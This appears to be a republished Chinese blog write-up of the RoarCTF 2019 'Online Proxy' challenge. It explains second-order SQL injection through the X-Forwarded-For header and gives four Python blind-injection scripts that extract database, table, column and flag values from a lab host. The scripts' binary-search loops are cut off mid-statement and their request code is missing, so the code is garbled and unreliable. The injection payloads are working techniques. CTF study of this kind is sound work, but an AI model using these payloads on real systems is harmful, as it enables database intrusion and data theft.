投稿
  1. 首页
  2. python

[RoarCTF 2019]Online Proxy

code2022-4-25python阅读99

[RoarCTF 2019]Online Proxy,第1张

[RoarCTF 2019]Online Proxy

看到ip联系一下 xff(识别ip的)可以自己修改

新知识点

一看到current IP和last IP,就应该想到,应该是把我们的IP给写到数据库里了。

跟SQL有关

挨个测试为单引号闭合

执行原理

数据在写入数据库时

1.127.0.0.1‘or’1在写入时为 Current Ip 当输入新的xff 123(任意)时

2.127.0.0.1‘or’1会被当做Last ip 123会成为新的Current Ip而127.0.0.1‘or’1会写入到数据库中

3.当再次执行123时由于写入数据相同,会提取当时的数据同时执行127.0.0.1‘or’1所以回显1

#爆数据库
import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

#爆表名
import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

#字段
import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x46346c395f4434743442343565),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)
#flag
import requests

url = "http://node3.buuoj.cn:28520/"
head = {
	"GET" : "/ HTTP/1.1",
	"Cookie" : "track_uuid=33a51b3b-f586-4070-d651-4ea39b145410",
	"X-Forwarded-For" : ""
}
result = ""
urls ="0' or ascii(substr((select F4l9_C01uMn from F4l9_D4t4B45e.F4l9_t4b1e limit 1,1),{0},1))>{1} or '0"
for i in range(1,100):
	l = 1
	r = 127
	mid = (l+r)>>1
	while(l>1
	if(chr(mid)==' '):
		break
	result+=chr(mid)
	print(result)
print("table_name:"+result)

欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/langs/718053.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
codecode管理员组
00
上一篇 2022-04-25
下一篇2022-04-25

发表评论

登录后才能评论

评论列表(0条)

    保存